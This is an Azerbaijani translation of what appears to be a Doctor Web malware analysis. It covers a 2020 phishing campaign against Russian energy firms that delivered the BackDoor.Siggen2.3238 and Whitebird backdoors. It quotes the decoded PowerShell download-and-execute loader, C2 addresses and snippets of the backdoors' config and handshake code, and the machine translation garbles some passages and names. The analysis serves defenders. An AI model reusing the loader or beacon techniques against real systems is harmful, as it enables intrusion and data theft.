Kompüter təhlükəsizliyi ilə bağlı insidentləri araşdırmaq təcrübəmiz göstərir ki, e-poçt hələ də təcavüzkarlar tərəfindən hücuma məruz qalan şəbəkə infrastrukturlarına ilkin olaraq nüfuz etmək üçün istifadə edilən ən çox yayılmış kanallardan biridir. Şübhəli (və ya o qədər də şübhəli olmayan) məktubla edilən bir ehtiyatsız hərəkət sonrakı infeksiya üçün giriş nöqtəsinə çevrilir, buna görə də kibercinayətkarlar müxtəlif müvəffəqiyyət dərəcələri ilə də olsa, sosial mühəndislik metodlarından fəal şəkildə istifadə edirlər.
Bu yazıda biz Rusiyanın yanacaq-energetika kompleksinin bir sıra müəssisələrini hədəf alan spam kampaniyası ilə bağlı son araşdırmamızdan danışmaq istəyirik. Bütün hücumlar saxta e-poçtlardan istifadə edərək eyni ssenari əsasında həyata keçirilirdi və heç kim bu e-poçtların mətn məzmununa çox səy göstərməmişdir.
Kəşfiyyat xidməti
Hər şey 2020-ci ilin aprel ayının sonunda, Doctor Web virus analitikləri hakerlərin Rusiyanın yanacaq-energetika kompleksindəki bir sıra müəssisələrin işçilərinə yenilənmiş telefon məlumat kitabçasını göndərdiyi spam kampaniyasını aşkar etdikdən sonra başladı. Əlbəttə ki, bu, sadə bir narahatlıq nümayişi deyildi, çünki kataloq real deyildi və .docx sənədləri uzaq resurslardan iki şəkil endirdi.
Onlardan biri news[.]zannews[.]com serverindən istifadəçinin kompüterinə endirilib. Maraqlıdır ki, domen adı Qazaxıstanın antikorrupsiya media mərkəzinin - zannews[.]kz domeninə bənzəyir. Digər tərəfdən, istifadə edilən domen dərhal TOPNEWS kimi tanınan, ICEFOG arxa qapısından istifadə edən və adlarında “xəbərlər” alt sətiri olan Trojan nəzarət domenlərinə malik olan başqa bir 2015-ci il kampaniyasını xatırladırdı. Digər maraqlı xüsusiyyət ondan ibarət idi ki, müxtəlif alıcılara e-məktublar göndərilərkən şəkil yükləmək üçün sorğular ya müxtəlif sorğu parametrlərindən, ya da unikal şəkil adlarından istifadə edirdi.
Hesab edirik ki, bu, məktubu lazımi vaxtda açacağına zəmanət veriləcək “etibarlı” ünvan sahibini müəyyən etmək üçün məlumat toplamaq məqsədilə edilib. İkinci serverdən şəkli yükləmək üçün SMB protokolundan istifadə edilib ki, bu da qəbul edilmiş sənədi açan işçilərin kompüterlərindən NetNTLM heşlərini toplamaq üçün edilə bilərdi.
Budur saxta kataloqu olan məktubun özü:
Bu ilin iyun ayında hakerlər şəkilləri yükləmək üçün sports[.]manhajnews[.]com adlı yeni domen adından istifadə etməyə başladılar. Təhlil göstərdi ki, manhajnews[.]com subdomenlərindən ən azı 2019-cu ilin sentyabrından spam göndərişlərində istifadə olunur. Bu kampaniyanın hədəflərindən biri böyük Rusiya universiteti idi.
Həmçinin, iyun ayına qədər hücumun təşkilatçıları öz məktubları üçün yeni mətn hazırladılar: bu dəfə sənəddə sənayenin inkişafı ilə bağlı məlumatlar var idi. Məktubun mətnində aydın şəkildə göstərilirdi ki, onun müəllifi ya rus dilində danışan deyil, ya da bilərəkdən özü haqqında belə təəssürat yaradır. Təəssüf ki, sənayenin inkişafı ideyaları, həmişə olduğu kimi, sadəcə bir örtük kimi çıxdı - sənəd yenidən iki şəkil endirdi, server isə yükləmə[.]inklingpaper[.]com olaraq dəyişdirildi.
Növbəti yenilik iyul ayında təqib edildi. Zərərli sənədlərin antivirus proqramları tərəfindən aşkarlanmasından yan keçmək cəhdi ilə təcavüzkarlar parolla şifrələnmiş Microsoft Word sənədlərindən istifadə etməyə başladılar. Eyni zamanda, təcavüzkarlar klassik sosial mühəndislik texnikasından - mükafat bildirişindən istifadə etmək qərarına gəliblər.
Müraciət mətninin yenə eyni üslubda yazılması ünvanda əlavə şübhə yaradıb. Şəkli yükləmək üçün server də dəyişməyib.
Qeyd edək ki, bütün hallarda məktubların göndərilməsi üçün mail[.]ru və yandex[.]ru domenlərində qeydiyyatdan keçmiş elektron poçt qutularından istifadə edilib.
Hücum
2020-ci ilin sentyabr ayının əvvəlinə hərəkət etmək vaxtı gəldi. Virus analitiklərimiz hücumların yeni dalğasını qeydə aldılar, bu dalğada təcavüzkarlar telefon kataloqunu yeniləmək bəhanəsi ilə yenidən məktublar göndərdilər. Lakin bu dəfə əlavədə zərərli makro var idi.
Əlavə edilmiş sənədi açarkən makro iki fayl yaratdı:
- VBS skripti %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs, toplu iş faylını işə salmaq üçün nəzərdə tutulmuşdu;
- Toplu faylın özü %APPDATA%configstest.bat.
Onun işinin mahiyyəti müəyyən parametrlərlə Powershell qabığını işə salmaqdan ibarətdir. Qabığa ötürülən parametrlər əmrlərə deşifrə olunur:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;Təqdim olunan əmrlərdən göründüyü kimi, faydalı yükün yükləndiyi domen yenidən xəbər saytı kimi maskalanır. Sadə , onun yeganə vəzifəsi komanda və idarəetmə serverindən shellcode almaq və onu icra etməkdir. Qurbanın kompüterində quraşdırıla bilən iki növ arxa qapını müəyyən edə bildik.
BackDoor.Siggen2.3238
Birincisi BackDoor.Siggen2.3238 — Mütəxəssislərimiz əvvəllər rast gəlməmişdilər və digər antivirus satıcıları tərəfindən də bu proqram haqqında heç bir qeyd edilməmişdir.
Bu proqram C++ dilində yazılmış və 32 bitlik Windows əməliyyat sistemlərində işləyən arxa qapıdır.
BackDoor.Siggen2.3238 iki protokoldan istifadə edərək idarəetmə serveri ilə əlaqə qura bilir: HTTP və HTTPS. Test edilmiş nümunə HTTPS protokolundan istifadə edir. Aşağıdakı User-Agent serverə sorğularda istifadə olunur:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
Bu halda, bütün sorğular aşağıdakı parametrlər dəsti ilə təmin edilir:
%s;type=%s;length=%s;realdata=%send
burada hər bir sətir %s müvafiq olaraq əvəz olunur:
- yoluxmuş kompüterin identifikatoru,
- göndərilən sorğunun növü,
- realdata sahəsində məlumatların uzunluğu,
- məlumat.
Yoluxmuş sistem haqqında məlumat toplama mərhələsində arxa qapı aşağıdakı kimi bir xətt yaradır:
lan=%s;cmpname=%s;username=%s;version=%s;
burada lan yoluxmuş kompüterin IP ünvanı, cmpname kompüter adı, istifadəçi adı istifadəçi adı, versiya 0.0.4.03 sətridir.
Sysinfo identifikatoru ilə bu məlumat POST sorğusu vasitəsilə https[:]//31.214[.]157.14/log.txt ünvanında yerləşən nəzarət serverinə göndərilir. Cavab olarsa BackDoor.Siggen2.3238 ÜRƏK siqnalını alır, əlaqə uğurlu hesab edilir və arxa qapı serverlə əlaqənin əsas dövrünə başlayır.
Əməliyyat prinsiplərinin daha tam təsviri BackDoor.Siggen2.3238 bizimdir .
Arxa Qapı.Ağquş.23
İkinci proqram Qazaxıstanda dövlət qurumu ilə insidentdən bizə artıq məlum olan BackDoor.Whitebird backdoor-un modifikasiyasıdır. Bu versiya C++ dilində yazılmışdır və həm 32-bit, həm də 64-bit Windows əməliyyat sistemlərində işləmək üçün nəzərdə tutulmuşdur.
Bu tip proqramların əksəriyyəti kimi, Arxa Qapı.Ağquş.23 nəzarət serveri ilə şifrəli əlaqə yaratmaq və yoluxmuş kompüterə icazəsiz nəzarət etmək üçün nəzərdə tutulmuşdur. Damcı istifadə edərək, təhlükə altında olan sistemə quraşdırılmışdır .
Tədqiq etdiyimiz nümunə iki ixracı olan zərərli kitabxana idi:
- Google Play
- Test et.
İşinin əvvəlində o, 0x99 baytı ilə XOR əməliyyatına əsaslanan alqoritmdən istifadə edərək arxa qapı korpusuna bərkidilmiş konfiqurasiyanın şifrəsini açır. Konfiqurasiya belə görünür:
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
Daimi işləməsini təmin etmək üçün arxa qapı sahədə göstərilən dəyəri dəyişir iş saatları konfiqurasiyalar. Sahədə 1440 və ya 0 dəyərlərini alan və günün hər saatının hər dəqiqəsini əks etdirən 1 bayt var. İnterfeysi dinləyən və yoluxmuş kompüterdən proksi serverdə avtorizasiya paketlərini axtaran hər bir şəbəkə interfeysi üçün ayrıca mövzu yaradır. Belə bir paket aşkar edildikdə, backdoor proksi server haqqında məlumatı öz siyahısına əlavə edir. Bundan əlavə, WinAPI vasitəsilə proxy-nin mövcudluğunu yoxlayır İnternet Sorğu SeçimləriW.
Proqram cari dəqiqə və saatı yoxlayır və onu sahədəki məlumatlarla müqayisə edir iş saatları konfiqurasiyalar. Günün müvafiq dəqiqəsinin dəyəri sıfır deyilsə, idarəetmə serveri ilə əlaqə qurulur.
Server ilə əlaqənin qurulması müştəri və server arasında TLS 1.0 versiyası protokolundan istifadə edərək əlaqə yaradılmasını simulyasiya edir. Arxa qapının gövdəsində iki tampon var.
Birinci bufer TLS 1.0 Client Hello paketini ehtiva edir.
İkinci buferdə açar uzunluğu 1.0x0 bayt olan TLS 100 Müştəri Açarı Mübadilə paketləri, Change Cipher Spec, Encrypted Handshake Message daxildir.
Client Hello paketini göndərərkən, backdoor Client Random sahəsinə cari vaxtın 4 baytını və 28 bayt psevdo-təsadüfi məlumatı yazır, aşağıdakı kimi hesablanır:
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
Qəbul edilən paket nəzarət serverinə göndərilir. Cavab (Server Hello paketi) yoxlayır:
- TLS protokolunun 1.0 versiyasına uyğunluq;
- müştəri tərəfindən müəyyən edilmiş vaxt damğasının (Təsadüfi məlumat paketi sahəsinin ilk 4 baytı) server tərəfindən müəyyən edilmiş vaxt damğasına uyğunluğu;
- müştəri və serverin Təsadüfi Məlumat sahəsində vaxt damğasından sonra ilk 4 baytın uyğunluğu.
Göstərilən uyğunluqlar olduqda, arxa qapı Müştəri Açarı Mübadilə paketini hazırlayır. Bunun üçün o, Müştəri Açarının Mübadilə paketindəki Açıq Açarı, həmçinin Şifrələnmiş Əl sıxma Mesajı paketindəki Şifrələmə IV və Şifrələmə Məlumatlarını dəyişdirir.
Ardınca arxa qapı komanda və idarəetmə serverindən paketi qəbul edir, TLS protokolunun versiyasının 1.0 olduğunu yoxlayır və sonra daha 54 baytı (paketin gövdəsi) qəbul edir. Bu, əlaqənin qurulmasını tamamlayır.
Əməliyyat prinsiplərinin daha tam təsviri Arxa Qapı.Ağquş.23 bizimdir .
Nəticə və nəticələr
Sənədlərin, zərərli proqramların və istifadə olunan infrastrukturun təhlili hücumun Çin APT qruplarından biri tərəfindən hazırlandığını əminliklə söyləməyə imkan verir. Uğurlu hücum zamanı qurbanların kompüterlərində quraşdırılan arxa qapıların funksionallığını nəzərə alsaq, infeksiya, ən azı, hücuma məruz qalan təşkilatların kompüterlərindən məxfi məlumatların oğurlanmasına gətirib çıxarır.
Bundan əlavə, çox ehtimal olunan bir ssenari, xüsusi funksiyası olan yerli serverlərdə ixtisaslaşmış troyanların quraşdırılmasıdır. Bunlar domen nəzarətçiləri, poçt serverləri, İnternet şlüzləri və s. ola bilər. Nümunədə gördüyümüz kimi , bu cür serverlər müxtəlif səbəblərdən təcavüzkarlar üçün xüsusi maraq doğurur.
Mənbə: www.habr.com